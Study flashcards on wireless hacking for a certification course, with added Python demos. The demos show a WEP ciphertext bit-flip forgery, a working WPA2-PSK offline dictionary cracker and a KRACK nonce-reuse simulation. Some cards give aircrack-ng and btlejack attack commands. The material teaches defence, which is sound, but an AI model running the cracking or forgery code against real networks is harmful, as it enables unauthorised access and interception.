Module 16 - Hacking Wireless Networks (EC Mode) Flashcards

1
Q

Which of the following technologies serves as an air interface for 4G and 5G broadband wireless communications?

A. OFDM
B. DSSS
C. FHSS
D. MIMO-OFDM

A

Answer: D. MIMO-OFDM

2
Q

Which of the following is a communication standard that is also known as WiMAX and is designed to provide multiple physical layer (PHY) and MAC options?

A. 802.11n
B. 802.16
C. 802.11g
D. 802.15.1

A

Answer:
B. 802.16

3
Q

Which of the following wireless standards uses modulation schemes such as GFSK, π/4-DPSK, and 8DPSK and a frequency of 2.4 GHz with data transfer rates in the range of 25–50 Mbps?

A. 802.16 (WiMAX)
B. 802.11a
C. 802.11g
D. 802.15.1 (Bluetooth)

A

Answer:
D. 802.15.1 (Bluetooth)

4
Q

Which type of antenna is commonly used in wireless communication?

A. Parabolic
B. Omnidirectional
C. Bidirectional
D. Unidirectional

A

Answer:
B. Omnidirectional

5
Q

What technology is used to connect wireless devices to a wireless/wired network?

A. Hotspot
B. Bandwidth
C. Access point (AP)
D. Association

A

Answer:
C. Access point (AP)

6
Q

In which authentication process do the station and access point use the same WEP key to provide authentication, which means that this key should be enabled and configured manually on both the access point and the client?

A. Shared key authentication process
B. Open-system authentication process
C. WEP encryption
D. WPA encryption

A

Answer:
A. Shared key authentication process

7
Q

Which of the following is considered a token used to identify a 802.11 (Wi-Fi) network, which is by default part of the frame header sent over a wireless local area network (WLAN)?

A. Association
B. SSID
C. Hotspot
D. Access point

A

Answer:
B. SSID

8
Q

Which of the following is considered as the method of transmitting radio signals by rapidly switching a carrier among many frequency channels?

A. Multiple input, multiple output orthogonal frequency-division multiplexing (MIMO-OFDM)
B. Direct-sequence Spread Spectrum (DSSS)
C. Frequency-hopping Spread Spectrum (FHSS)
D. Orthogonal Frequency-division Multiplexing (OFDM)

A

Answer:
C. Frequency-hopping Spread Spectrum (FHSS)

9
Q

Which of the following wireless technologies involves multiplying the original data signal with a pseudo-random noise spreading code?

A. Frequency-hopping Spread Spectrum (FHSS)
B. Direct-sequence Spread Spectrum (DSSS)
C. Multiple input, multiple output orthogonal frequency-division multiplexing (MIMO-OFDM)
D. Orthogonal Frequency-division Multiplexing (OFDM)

A

Answer:
B. Direct-sequence Spread Spectrum (DSSS)

10
Q

Which of the following is a standard for Wireless Local Area Networks (WLANs) that provides improved encryption for networks that use 802.11a, 802.11b, and 802.11g standards?

A. 802.11n
B. 802.11i
C. 802.11e
D. 802.11d

A

Answer:
B. 802.11i

11
Q

Which of the following terms describes the amount of information that may be broadcast over a connection?

A. Bandwidth
B. ISM band
C. BSSID
D. Hotspot

A

Answer:
A. Bandwidth

12
Q

In a LAN-to-LAN wireless network, the APs provide wireless connectivity to local computers, and computers on different networks can be interconnected. True or false?

A. True
B. False

A

Answer:
True

13
Q

Which of the following Wi-Fi security protocols uses GCMP-256 for encryption and HMAC-SHA-384 for authentication?

A. CCMP
B. WPA3
C. PEAP
D. WEP

A

Answer:
B. WPA3

14
Q

Which of the following encryption methods has KRACK vulnerabilities that make it susceptible to packet sniffing, connection hijacking, malware injection, and decryption attacks?

A. WPA2
B. EAP
C. WPA
D. WEP

A

Answer:
A. WPA2

15
Q

Which of the following encryption methods does WPA2 use for wireless data encryption, and at which encryption level?

A. 128 bit and TKIP
B. 64 bit and CCMP
C. 128 bit and CCMP
D. 128 bit and CRC

A

Answer:
C. 128 bit and CCMP

16
Q

Which of the following cryptographic algorithms is used by CCMP?

A. DES
B. RC4
C. TKIP
D. AES

A

Answer:
D. AES

17
Q

Donald works as a network administrator with ABCSecurity, Inc., a small IT-based firm in San Francisco. He was asked to set up a wireless network on the company premises that provides strong encryption to protect the wireless network against attacks. After doing some research, Donald decided to use a wireless security protocol with the following features:

Provides stronger data protection and network access control
Uses AES encryption algorithm for strong wireless encryption
Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP)
Which of the following wireless security protocols did Donald decide to use?

A. WEP
B. TKIP
C. WPA
D. WPA2

A

Answer:
D. WPA2

18
Q

Which of the following encryption techniques is used in WPA?

A. RSA
B. DES
C. TKIP
D. AES

A

Answer:
C. TKIP

19
Q

Which of the following wireless security protocols does not provide cryptographic integrity protection?

A. WEP
B. WPA2
C. TKIP
D. WPA

A

Answer:
A. WEP

20
Q

Which of the following protocols encapsulates the EAP within an encrypted and authenticated Transport Layer Security (TLS) tunnel?

A. PEAP
B. CCMP
C. RADIUS
D. LEAP

A

Answer:
A. PEAP

21
Q

Which of the following wireless security protocols consists of 40/104 bit encryption key length?

A. WEP
B. RSA
C. WPA2
D. WPA

A

Answer:
A. WEP

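
Cards 19 and 21 above say that WEP uses a 40- or 104-bit RC4 key and that its CRC-32 ICV is not cryptographic integrity protection. The Python below, added here as an example and not part of the original flashcards or of any EC-Council material, implements a simplified WEP frame (IV || RC4(IV || key, data || CRC-32)) and then shows why the ICV fails: RC4 is a stream cipher, so XORing into the ciphertext XORs into the plaintext, and CRC-32 is linear, so the encrypted ICV can be patched to match without ever knowing the key. The key, IV and payload are constructed sample values.

```python
"""WEP-style RC4 + CRC-32 ICV and an ICV-preserving bit-flip.

Added example, not part of the original flashcards. The frame layout is
simplified to IV (3 bytes) || RC4(IV || WEP key, data || CRC32(data));
the key, IV and payload below are constructed sample values.
"""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the keystream generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended to the data."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # 40-bit (5-byte) or 104-bit (13-byte) WEP key; the 24-bit IV is sent in the clear
    assert len(wep_key) in (5, 13) and len(iv) == 3
    return iv + rc4(iv + wep_key, plaintext + icv(plaintext))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Returns (data, icv_ok). A real receiver drops the frame when icv_ok is False."""
    iv, body = frame[:3], frame[3:]
    pt = rc4(iv + wep_key, body)
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker side: no key needed.

    XORing `delta` into the ciphertext XORs it into the plaintext (stream cipher).
    CRC-32 is linear: crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros), so the encrypted
    ICV is corrected by XORing in icv(delta) ^ icv(zeros).
    """
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n
    correction = xor(icv(delta), icv(bytes(n)))
    return iv + xor(body[:n], delta) + xor(body[n:], correction)


# Constructed sample values (not from the flashcards or any real capture)
WEP_KEY = bytes.fromhex("0102030405")   # 40-bit key
IV = bytes.fromhex("000001")
PLAINTEXT = b"PAY 0100 TO ALICE"


def tamper_demo():
    """Encrypt, then change the amount from 0100 to 9900 without the key."""
    frame = wep_encrypt(WEP_KEY, IV, PLAINTEXT)
    delta = bytearray(len(PLAINTEXT))
    delta[4] = ord("0") ^ ord("9")   # '0' -> '9'
    delta[5] = ord("1") ^ ord("9")   # '1' -> '9'
    forged = flip_bits(frame, bytes(delta))
    return wep_decrypt(WEP_KEY, forged)   # (b"PAY 9900 TO ALICE", True)


if __name__ == "__main__":
    data, ok = tamper_demo()
    print(data, "ICV valid:", ok)
```

This is the reason WPA's TKIP added the keyed Michael MIC and WPA2's CCMP uses an AES-based CBC-MAC tag: a keyed MIC cannot be corrected with this arithmetic. The 24-bit IV also repeats quickly on a busy network, which is what the IV-collection step in the aircrack-ng cards further down exploits.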
22
Q

Which of the following wireless security protocols includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)?

A. WEP
B. TKIP
C. WPA2
D. WPA

A

Answer:
C. WPA2

23
Q

Which of the following attack techniques is used by an attacker to send forged control, management, or data frames over a wireless network to misdirect wireless devices and perform other types of attacks such as DoS?

A. Availability attack
B. Integrity attack
C. Confidentiality attack
D. Authentication attack

A

Answer:
B. Integrity attack

24
Q

Which of the following is a type of access-control attack in which an attacker uses any USB adapter or wireless card and connects a host to an unsecured client to attack a specific client or to avoid AP security?

A. Ad hoc association
B. Promiscuous client
C. Unauthorized association
D. Client mis-association

A

Answer:
A. Ad hoc association

25
Q

In which of the following types of attack does an attacker exploit the carrier-sense multiple access with collision avoidance (CSMA/CA) clear channel assessment (CCA) mechanism to make a channel appear busy?

A. Beacon flood
B. EAP failure
C. Access point theft
D. Denial of service

A

Answer:
D. Denial of service

26
Q

In which of the following attacks does an attacker exploit dynamic routing protocols, such as DSR and AODV, and place themselves strategically in a target network to sniff and record ongoing wireless transmissions?

A. Wormhole attack
B. Honeypot AP attack
C. Sinkhole attack
D. RADIUS replay

A

Answer:
A. Wormhole attack

27
Q

John is a pen tester working with an information security consultant based in Paris. As part of a penetration testing assignment, he was asked to perform wireless penetration testing for a large MNC. John knows that the company provides free Wi-Fi access to its employees on the company premises. He sets up a rogue wireless access point with the same SSID as that of the company’s Wi-Fi network just outside the company premises. He sets up this rogue access point using the tools that he has and hopes that the employees might connect to it. What type of wireless confidentiality attack is John trying to do?

A. KRACK Attack
B. War Driving
C. WEP Cracking
D. Evil Twin AP

A

Answer:
D. Evil Twin AP

28
Q

Posing as an authorized AP by beaconing the WLAN’s service set identifier (SSID) to lure users is known as __________.

A. Evil Twin AP
B. Honeypot AP
C. Man-in-the-Middle Attack
D. Masquerading

A

Answer:
A. Evil Twin AP

29
Q

Steven, a wireless network administrator, has just finished setting up his company’s wireless network. He has enabled various security features such as changing the default SSID and enabling strong encryption on the company’s wireless router. Steven decides to test the wireless network for confidentiality attacks to check whether an attacker can intercept information sent over wireless associations, whether sent in clear text or encrypted by Wi-Fi protocols. As a part of testing, he tries to capture and decode unprotected application traffic to obtain potentially sensitive information using hardware or software tools such as Ettercap, Kismet, Wireshark, etc. What type of wireless confidentiality attack is Steven trying to do?

A. Masquerading
B. Eavesdropping
C. WEP Key Cracking
D. Evil Twin AP

A

Answer:
B. Eavesdropping

30
Q

Which of the following attacks is an inter-chip privilege escalation attack, where an attacker exploits the underlying vulnerabilities in wireless chips that handle wireless communications such as Bluetooth and Wi-Fi?

A. Evil twin
B. Wireless co-existence attack
C. aLTEr attack
D. AP MAC spoofing

A

Answer:
B. Wireless co-existence attack

31
Q

In a GNSS spoofing technique, attackers track the receiver’s position and identify the deviation from the original location to a fake one. Identify this technique.

A. Interrupting the lock mechanism
B. Cancellation methodology
C. Meaconing method
D. Drag-off strategy

A

Answer:
D. Drag-off strategy

32
Q

In which of the following techniques does an attacker draw symbols in public places to advertise open Wi-Fi networks?

A. Wardriving
B. Warwalking
C. Warflying
D. Warchalking

A

Answer:
D. Warchalking

33
Q

Which of the following tools is designed to capture a WPA/WPA2 handshake and act as an ad-hoc AP?

A. Airbase-ng
B. Airolib-ng
C. Airmon-ng
D. Airodump-ng

A

Answer:
A. Airbase-ng

34
Q

Which of the following tools is used by an attacker to create rogue APs and perform sniffing and MITM attacks?

A. Halberd
B. MANA Toolkit
C. Gobuster
D. Skyhook

A

Answer:
B. MANA Toolkit

35
Q

Which tool would be used to collect wireless packet data?

A. NetStumbler
B. Netcat
C. Nessus
D. John the Ripper

A

Answer:
A. NetStumbler

36
Q

There is a WEP-encrypted wireless AP with no clients connected. In order to crack the WEP key, a fake authentication needs to be performed. Which of the following steps needs to be performed by the attacker to carry out the fake authentication?

A. Set the wireless interface to monitor mode
B. Ensure association of source MAC address with the AP
C. Use cracking tools
D. Capture the IVs

A

Answer:
B. Ensure association of source MAC address with the AP

37
Q

Kenneth, a professional penetration tester, was hired by the XYZ Company to conduct wireless network penetration testing. Kenneth proceeds with the standard steps of wireless penetration testing. He tries to collect lots of initialization vectors (IVs) using the injection method to crack the WEP key. He uses the aircrack-ng tool to capture the IVs from a specific AP. Which of the following aircrack-ng commands will help Kenneth to do this?

A. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
B. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
C. airmon-ng start wifi0 9
D. aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

A

Answer:
B. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

38
Q

Andrew, a professional penetration tester, was hired by ABC Security, Inc., a small IT-based firm in the United States, to conduct a test of the company's wireless network. During the information-gathering process, Andrew discovers that the company is using the 802.11g wireless standard. Using the NetSurveyor Wi-Fi network discovery tool, Andrew starts gathering information about wireless APs. After trying several times, he is not able to detect a single AP. What do you think is the reason behind this?

A. MAC address filtering feature must be disabled on APs or router.
B. SSID broadcast feature must be disabled, so APs cannot be detected.
C. Andrew must be doing something wrong, as there is no reason for him to not detect access points.
D. NetSurveyor does not work against 802.11g.

A

Answer: B. SSID broadcast feature must be disabled, so APs cannot be detected.

39
Q

Which of the following tools helps attackers identify networks by passively collecting packets and detecting standard named networks, hidden networks, and the presence of non-beaconing networks via data traffic?

A. Robber
B. L0phtCrack
C. Kismet
D. Netcraft

A

Answer: C. Kismet

40
Q

Mark is working as a penetration tester in InfoSEC, Inc. One day, he notices that the traffic on the internal wireless router suddenly increases by more than 50%. He knows that the company is using a wireless 802.11 a/b/g/n/ac network. He decided to capture live packets and browse the traffic to investigate the issue to find out the actual cause. Which of the following tools should Mark use to monitor the wireless network?

A. CommView for Wi-Fi
B. WiFish Finder
C. BlueScan
D. WiFiFoFum

A

Answer: A. CommView for Wi-Fi

41
Q

Which of the following is a portable RFID cloning device that can be used by attackers to clone RFID tags?

A. KeyGrabber
B. PCB-2040 Jammer
C. Hardware Protocol Analyzer
D. iCopy-X

A

Answer: D. iCopy-X

42
Q

Which of the following security standards contains the Dragonblood vulnerabilities that help attackers recover keys, downgrade security mechanisms, and launch various information-theft attacks?

A. WPA2
B. WEP
C. WPA
D. WPA3

A

Answer: D. WPA3

43
Q

During a wireless penetration test, a tester detects an AP using the WPA2 encryption. Which of the following attacks should be used to obtain the key?

A. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
B. The tester must capture the WPA2 authentication handshake and then crack it.
C. The tester must use the tool inSSIDer to crack it using the ESSID of the network.
D. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key.

A

Answer: B. The tester must capture the WPA2 authentication handshake and then crack it.
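
Card 43 says the way to attack WPA2-PSK is to capture the 4-way handshake and crack it offline. The Python below, an added example rather than anything from the original flashcards or from aircrack-ng, shows what "crack it" means: for each candidate passphrase, derive the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), expand it to the PTK with the 802.11i PRF-512 over both MAC addresses and both nonces, take the first 128 bits as the KCK, and recompute the MIC of EAPOL message 2; a match identifies the passphrase. The SSID, passphrase, MAC addresses, nonces and EAPOL frame are constructed stand-ins for a real capture.

```python
"""WPA2-PSK 4-way handshake: derive PMK/PTK and check candidate passphrases against a captured MIC.

Added example, not part of the original flashcards. The SSID, passphrase,
MAC addresses, nonces and EAPOL frame are constructed values standing in for a capture.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # WPA2 with AKM 00-0F-AC:2: MIC = HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), first 128 bits
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, replay_counter: int) -> bytes:
    """Minimal EAPOL-Key message 2 with the MIC field zeroed (802.11 EAPOL-Key layout)."""
    key_data = b""
    body = (
        b"\x02"                               # descriptor type: RSN
        + b"\x01\x0a"                         # key info: MIC bit, pairwise, descriptor version 2 (HMAC-SHA1/AES)
        + b"\x00\x10"                         # key length: 16 (CCMP)
        + replay_counter.to_bytes(8, "big")
        + snonce
        + bytes(16)                           # key IV
        + bytes(8)                            # key RSC
        + bytes(8)                            # key ID (reserved)
        + bytes(16)                           # MIC, zeroed for computation
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X version 1, type EAPOL-Key


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic):
    """Offline dictionary attack: recompute the MIC for each candidate and compare."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]   # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# Constructed "capture" (not real data)
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = build_eapol_msg2(SNONCE, replay_counter=1)
TRUE_PASSPHRASE = "Winter2024!"   # the network's real passphrase, used only to forge the capture


def captured_mic() -> bytes:
    """Simulate what airodump-ng would record: message 2 carrying the station's real MIC."""
    kck = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2)


def demo(wordlist=("password", "letmein", "Winter2024!", "CorpWiFi123")):
    return crack_psk(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, captured_mic())


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The handshake itself leaks nothing; what is attacked is the passphrase's guessability, so the only PSK-side defence is a long random passphrase (or WPA3's SAE, whose transcript cannot be verified offline). aircrack-ng and hashcat mode 22000 run exactly this loop, only much faster.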

44
Q

Which of the following techniques involves sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones and laptops?

A. Bluejacking
B. Bluesmacking
C. BluePrinting
D. Bluebugging

A

Answer: A. Bluejacking

45
Q

Fill in the blank.

_________ is the art of collecting information about Bluetooth-enabled devices such as manufacturer, device model and firmware version.

A. BlueSniff
B. BluePrinting
C. Bluebugging
D. Bluejacking

A

Answer: B. BluePrinting

46
Q

Thomas is a cyber thief trying to hack Bluetooth-enabled devices at public places. He decided to hack Bluetooth-enabled devices by using a DoS attack. He started sending an oversized ping packet to a victim’s device, causing a buffer overflow and finally succeeded. What type of Bluetooth device attack is Thomas most likely performing?

A. Bluesnarfing
B. Bluejacking
C. Bluesmacking
D. Bluebugging

A

Answer: C. Bluesmacking

47
Q

Which of the following terms is used to describe an attack in which an attacker gains remote access to a target Bluetooth-enabled device without the victim being aware of it?

A. Bluesnarfing
B. Bluesmacking
C. Bluebugging
D. Bluejacking

A

Answer: C. Bluebugging

48
Q

An attacker collects the make and model of target Bluetooth-enabled devices and analyzes them in an attempt to find out whether the devices are in the range of vulnerability to exploit. Identify which type of attack is performed on Bluetooth devices.

A. BlueSniff
B. MAC Spoofing Attack
C. BluePrinting
D. Bluebugging

A

Answer: C. BluePrinting

49
Q

In which of the following Bluetooth threats does an attacker trick Bluetooth users into lowering security or disabling authentication for Bluetooth connections to pair with them and steal information?

A. Bugging devices
B. Protocol exploitation
C. Malicious code
D. Social engineering

A

Answer: D. Social engineering

50
Q

Which of the following btlejack commands allows an attacker to sniff new Bluetooth low-energy connections?

A. btlejack -c any
B. btlejack -f 0x129f3244 -j
C. btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
D. btlejack -s

A

Answer: A. btlejack -c any

51
Q

Which of the following Bluetooth modes prevents a device from appearing on a device list during a Bluetooth-enabled device search process but remains visible to users and devices that were previously paired with it?

A. Limited discoverable mode
B. Discoverable mode
C. Non-pairable mode
D. Non-discoverable mode

A

Answer: D. Non-discoverable mode

52
Q

Which of the following protocols is used by BlueJacking to send anonymous messages to other Bluetooth-equipped devices?

A. SDP
B. LMP
C. OBEX
D. L2CAP

A

Answer: C. OBEX

54
Q

Which of the following countermeasures helps in defending against Bluetooth hacking?

A. Check the wireless devices for configuration or setup problems regularly.
B. Use non-regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential on the keypad.
C. Place a firewall or packet filter between the AP and the corporate intranet.
D. Implement an additional technique for encrypting traffic, such as IPSEC over wireless.

A

Answer: B. Use non-regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential on the keypad.

55
Q

Which of the following practices makes an organization’s wireless network vulnerable to aLTEr attacks?

A. Encrypt DNS queries and use only trusted DNS resolvers.
B. Access only websites having HTTPS connections.
C. Use DNS over Transport Layer Security (TLS) or DNS over datagram TLS (DTLS) to encrypt DNS traffic and for integrity protection.
D. Do not use a virtual network tunnel with integrity protection and endpoint authentication.

A

Answer: D. Do not use a virtual network tunnel with integrity protection and endpoint authentication.

56
Q

Which of the following practices helps manufacturers protect their devices against GNSS spoofing attacks?

A. Do not correlate the GNSS timing with other timing sources such as inertial measurement units (IMUs).
B. Avoid deploying GNSS cryptographic methods such as spreading code encryption (SCE).
C. Deploy defensive devices such as antennae and radio spectra against software attacks.
D. Never deploy spatial-based processing with space-time adaptive processing (STAP).

A

Answer: C. Deploy defensive devices such as antennae and radio spectra against software attacks.

57
Q

Which of the following practices makes an organization’s wireless environment vulnerable to various attacks?

A. Enable Simple Network Management Protocol (SNMP).
B. Enable MAC address filtering on APs or routers.
C. Set the router access password and enable firewall protection.
D. Disable the Dynamic Host Configuration Protocol (DHCP) and rely on static IP addresses.

A

Answer: A. Enable Simple Network Management Protocol (SNMP).

58
Q

Which of the following practices help security professionals in defending their network against wireless attacks?

A. Never place a firewall or packet filter between an AP and the corporate Intranet.
B. Modify the SSID with some unique characters and strings.
C. Do not limit the strength of the wireless network so that it can be detected outside the bounds of the organization.
D. Avoid using SSID cloaking.

A

Answer: B. Modify the SSID with some unique characters and strings.

59
Q

Which of the following is to be used to keep certain default wireless messages from broadcasting the ID to everyone?

A. Bluejacking
B. Bluesmacking
C. MAC Spoofing
D. SSID Cloaking

A

Answer: D. SSID Cloaking

60
Q

Which of the following techniques is used by network management software to detect rogue APs?

A. Virtual-private network
B. AP scanning
C. Wired side inputs
D. RF scanning

A

Answer: C. Wired side inputs

61
Q

Which of the following components of Cisco’s WIPS deployment forwards attack information from wireless IPS monitor-mode APs to the MSE and distributes configuration parameters to APs?

A. Mobility services engine
B. Wireless LAN controller
C. Local mode AP
D. Wireless control system

A

Answer: B. Wireless LAN controller

62
Q

Which of the following practices makes the Bluetooth-enabled devices of an organization vulnerable to various attacks?

A. Use link encryption for all Bluetooth connections.
B. Change the default settings of the Bluetooth-enabled device to the best security standard.
C. Avoid sharing sensitive information over Bluetooth-enabled devices.
D. Always grant Bluetooth access permission to applications.

A

Answer: D. Always grant Bluetooth access permission to applications.

63
Q

Which of the following practices is NOT a preventive measure against KRACK attacks?

A. Avoid using public Wi-Fi networks
B. Enable two-factor authentication
C. Turn off auto updates for all wireless devices
D. Always enable the HTTPS Everywhere extension

A

Answer: C. Turn off auto updates for all wireless devices

65
Q

Which of the following practices assists security professionals in defending a wireless network against KRACK attacks?

A. Allow using public Wi-Fi networks.
B. Access sensitive resources when the device is connected to an unprotected network.
C. Turn off auto updates for all the wireless devices.
D. Employ the EAPOL-key replay counter to ensure that the AP recognizes only the latest counter value.

A

Answer: D. Employ the EAPOL-key replay counter to ensure that the AP recognizes only the latest counter value.
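
Cards 14 and 65 concern KRACK. The simulation below, an added example and not code from the flashcards or from any Wi-Fi stack, models a supplicant receiving message 3 of the 4-way handshake. It keeps the EAPOL-Key replay counter check from card 65 and adds the hardening that actually stops the attack: when message 4 is blocked, the AP legitimately retransmits message 3 with a fresh counter, so a counter check alone accepts it, the client reinstalls the same PTK, its CCMP packet number restarts at zero and keystream is reused; the patched client refuses to reinstall a key that is already in use. The keystream function is a toy SHA-256 stand-in for AES-CTR, and all values are constructed.

```python
"""Simulated supplicant handling of 4-way handshake message 3: KRACK key reinstallation and its fix.

Added example, not part of the original flashcards. The "cipher" is a toy
keystream (SHA-256 of key || packet number) standing in for CCMP's AES-CTR
keystream; only the nonce-reuse property matters here. All values are constructed.
"""
import hashlib


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    def __init__(self, patched: bool):
        self.patched = patched
        self.last_replay_counter = -1   # highest EAPOL-Key replay counter accepted so far
        self.ptk = None
        self.pn = 0                     # CCMP packet number, the per-key nonce
        self.log = []

    def handle_msg3(self, replay_counter: int, ptk: bytes) -> str:
        # Standard check: drop any EAPOL-Key frame whose counter is not newer than the last accepted one
        if replay_counter <= self.last_replay_counter:
            self.log.append("msg3 dropped: stale replay counter")
            return "dropped"
        self.last_replay_counter = replay_counter
        # Hardened supplicant: a key already in use is never reinstalled, so the PN is never reset
        if self.patched and self.ptk == ptk:
            self.log.append("msg3 accepted but key already in use; not reinstalled")
            return "ignored"
        self.ptk = ptk
        self.pn = 0   # (re)installing a key restarts the packet number from zero
        self.log.append("key installed, PN reset")
        return "installed"

    def send(self, plaintext: bytes):
        """Encrypt one frame; returns (ciphertext, packet number used)."""
        self.pn += 1
        keystream = hashlib.sha256(self.ptk + self.pn.to_bytes(6, "big")).digest()[:len(plaintext)]
        return xor(plaintext, keystream), self.pn


PTK = bytes.fromhex("00" * 15 + "01")   # constructed
FRAME_A = b"GET /secret HTTP/1.1"
FRAME_B = b"POST /login HTTP/1.1"


def krack_scenario(patched: bool) -> dict:
    sta = Supplicant(patched)
    sta.handle_msg3(replay_counter=1, ptk=PTK)
    ct_a, pn_a = sta.send(FRAME_A)
    # Attacker withholds message 4; the AP legitimately retransmits message 3 with a fresh counter
    sta.handle_msg3(replay_counter=2, ptk=PTK)
    ct_b, pn_b = sta.send(FRAME_B)
    # A pure replay of the old message 3 (counter 1) is rejected by both variants
    replay_result = sta.handle_msg3(replay_counter=1, ptk=PTK)
    return {
        "nonce_reused": pn_a == pn_b,
        # With a reused keystream, XOR of the two ciphertexts equals XOR of the two plaintexts
        "keystream_reuse_visible": xor(ct_a, ct_b) == xor(FRAME_A, FRAME_B),
        "stale_replay": replay_result,
        "log": sta.log,
    }


if __name__ == "__main__":
    for patched in (False, True):
        r = krack_scenario(patched)
        print("patched" if patched else "vulnerable", r["nonce_reused"], r["keystream_reuse_visible"])
```

The replay counter on its own only blocks stale copies of old frames; the fix shipped by Wi-Fi vendors after KRACK is the "do not reinstall an in-use key" rule shown in the patched branch, which is why "keep devices updated" is the practical countermeasure behind cards 63 and 65.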